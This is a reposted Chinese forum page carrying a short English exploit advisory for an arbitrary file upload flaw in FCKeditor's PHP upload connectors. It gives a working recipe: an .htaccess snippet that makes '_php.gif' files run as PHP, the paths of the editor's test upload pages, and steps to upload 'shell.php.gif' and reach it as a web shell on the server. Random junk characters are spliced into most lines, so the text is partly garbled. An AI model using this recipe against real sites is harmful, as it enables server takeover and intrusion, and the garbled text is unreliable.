FCKeditor所有php版本Upload上传漏洞, ]' I( s8 |5 j4 P
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
0 i' A) M" f7 b减小字体 增大字体 m0 W0 j: W3 `3 N. r- o
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability# [* H; _7 v: u* R. d U' x
[+] Date: 2011
1 @9 w* `7 Z, y[+] Author : sinesafe.cn @; v% n' ^1 \9 N) X
[+] Website : WwW.sinesafe.cn5 x* h9 }0 S8 | i4 [4 h
———————————————————
+ r% Y$ O# B$ s3 E; d+ b7 K. `1.create a htaccess file:, S7 L) u {& s2 A. o% J' u
code:$ f# G2 j5 L+ V2 d; {4 |
<FilesMatch “_php.gif”>6 _) p2 `# o/ i- y( N- A( |
SetHandler application/x-httpd-php0 C7 x" H6 w) G( _
</FilesMatch>9 Q/ l" W9 ~( A! R! j
1 X7 |* q" W# u! B
2.Now upload this htaccess with FCKeditor.
0 P. w: c& M6 N" D/ \7 | U0 l' ~' G- Y: H9 h% e& {3 _
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html. w. X5 }+ ^: |; k( T6 H
2 K0 o2 W# S2 n2 \ V6 h& i. o1 uhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html c# h+ i0 N# Q' p D e
6 E, C: K0 Q0 `4 y———————————————————————————————-9 x' S6 y, F+ a
3.Now upload shell.php.gif with FCKeditor.7 ^$ {# T+ x9 A; j R
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.! l. H' \) s! m" }# L L) V
5.http://www.sinesafe.cn/anything/shell_php.gif
# o# }! L$ K0 \( ~# w6.Now shell is available from server. |
' X$ ~$ ^6 w5 i; B
# U% D6 K: r" }! S, S/ s/ \- l2 N5 u: S* Y! h
|
发表于 2013-10-27 17:25:21
收藏
支持
反对